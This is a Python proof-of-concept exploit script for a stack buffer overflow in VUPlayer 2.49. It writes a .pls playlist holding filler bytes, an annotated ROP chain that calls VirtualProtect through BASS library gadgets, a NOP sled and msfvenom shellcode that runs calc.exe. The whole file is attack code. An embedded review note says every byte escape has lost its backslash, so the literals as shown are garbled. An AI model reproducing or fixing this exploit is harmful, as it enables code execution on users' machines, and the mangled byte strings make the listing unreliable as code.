VUPlayer 2.49 .pls Stack Buffer Overflow
Posted on 03 August 2016
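#!/usr/bin/python
"""Proof-of-concept file generator for the VUPlayer 2.49 .pls stack buffer overflow.

Run as a script, this writes a .pls playlist whose single over-long entry is:
1012 filler characters, a ROP chain, an 8-entry NOP sled and the msfvenom
windows/exec payload.  The gadget annotations and the generation notes are the
original author's and are kept verbatim.

NOTE(review): in this copy of the listing every string literal has lost the
leading backslash of its ``\\xNN`` escape, so ``"x41"`` is three ASCII
characters rather than one byte.  The literals are reproduced exactly as they
appear, and every length reported or asserted here counts those characters.
"""
import os
import sys

# Tested Windows 7 Home x86 & Windows 10 Home x86_x64
# badchars x00x0ax1ax20x40
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "x00x0ax1ax20x40" -f python

# Output location exactly as in the original listing (absolute path).
OUTPUT_PATH = '/root/Desktop/exploit_development/VUPlayer/boom.pls'


def build_shellcode():
    """Return the encoded windows/exec payload, concatenated from the original ``buf`` chunks.

    The chunks are joined once instead of via repeated ``+=``; their content is
    byte-for-byte the original listing's.
    """
    chunks = (
        "xbfx3bx99xddxa3xdbxc4xd9x74x24xf4x58x29",
        "xc9xb1x33x31x78x12x03x78x12x83xfbx9dx3f",
        "x56x07x75x36x99xf7x86x29x13x12xb7x7bx47",
        "x57xeax4bx03x35x07x27x41xadx9cx45x4exc2",
        "x15xe3xa8xedxa6xc5x74xa1x65x47x09xbbxb9",
        "xa7x30x74xccxa6x75x68x3fxfax2exe7x92xeb",
        "x5bxb5x2ex0dx8cxb2x0fx75xa9x04xfbxcfxb0",
        "x54x54x5bxfax4cxdex03xdbx6dx33x50x27x24",
        "x38xa3xd3xb7xe8xfdx1cx86xd4x52x23x27xd9",
        "xabx63x8fx02xdex9fxecxbfxd9x5bx8fx1bx6f",
        "x7ex37xefxd7x5axc6x3cx81x29xc4x89xc5x76",
        "xc8x0cx09x0dxf4x85xacxc2x7dxddx8axc6x26",
        "x85xb3x5fx82x68xcbx80x6axd4x69xcax98x01",
        "x0bx91xf6xd4x99xafxbfxd7xa1xafxefxbfx90",
        "x24x60xc7x2cxefxc5x37x67xb2x6fxd0x2ex26",
        "x32xbdxd0x9cx70xb8x52x15x08x3fx4ax5cx0d",
        "x7bxccx8cx7fx14xb9xb2x2cx15xe8xd0xb3x85",
        "x70x39x56x2ex12x45",
    )
    return "".join(chunks)


def build_rop_chain():
    """Return the ROP chain from the original listing, in the original gadget order.

    Assembling from a tuple lets each entry keep the author's annotation
    without the ``rop +=`` noise; content is unchanged.
    """
    gadgets = (
        "xe7x5fx01x10",  # POP EAX # RETN [BASS.dll]
        "x5cxe2x60x10",  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
        "xf1xeax01x10",  # MOV EAX,DWORD PTR DS:[EAX] # RTN [BASS.dll]
        "x50x09x03x10",  # XCHG EAX,ESI # RETN [BASS.dll]
        "x0cx80x60x10",  # POP EBP # RETN 0x0C [BASSMIDI.dll]
        "x9fx53x10x10",  # & jmp esp BASSWMA.dll
        "xe7x5fx01x10",  # POP EAX # RETN [BASS.dll]
        "x90" * 12,
        "xffxfdxffxff",  # 201 in negative
        "xb4x4dx01x10",  # NEG EAX # RETN [BASS.dll]
        "x72x2fx03x10",  # XCHG EAX,EBX # RETN [BASS.dll]
        "xe7x5fx01x10",  # POP EAX # RETN [BASS.dll]
        "xc0xffxffxff",  # 40 in negative
        "xb4x4dx01x10",  # NEG EAX # RETN [BASS.dll]
        "x6cx8ax03x10",  # XCHG EAX,EDX # RETN [BASS.dll]
        "x07x10x10x10",  # POP ECX # RETN [BASSWMA.dll]
        "x93x83x10x10",  # &Writable location [BASSWMA.dll]
        "x04xdcx01x10",  # POP EDI # RETN [BASS.dll]
        "x84xa0x03x10",  # RETN [BASS.dll]
        "xe7x5fx01x10",  # POP EAX # RETN [BASS.dll]
        "x90" * 4,
        "xa5xd7x01x10",  # PUSHAD # RETN [BASS.dll]
    )
    return "".join(gadgets)


def build_payload():
    """Return the full .pls content: 1012 filler entries, ROP chain, 8 NOP entries, shellcode.

    Same layout and order as the original ``exploit`` expression.
    """
    return "x41" * 1012 + build_rop_chain() + "x90" * 8 + build_shellcode()


def main():
    """Print the ROP-chain length and write the payload to OUTPUT_PATH.

    Raises:
        IOError/OSError: if OUTPUT_PATH cannot be opened for writing.
    """
    # Same diagnostic as the original (`print "len + " + str(len(rop))`), in
    # the single-argument call form that both Python 2 and Python 3 accept.
    print("len + " + str(len(build_rop_chain())))
    # `with` closes the handle even if the write raises; the original left it
    # open on error and shadowed the builtin name `file`.
    with open(OUTPUT_PATH, 'w') as out:
        out.write(build_payload())


if __name__ == "__main__":
    main()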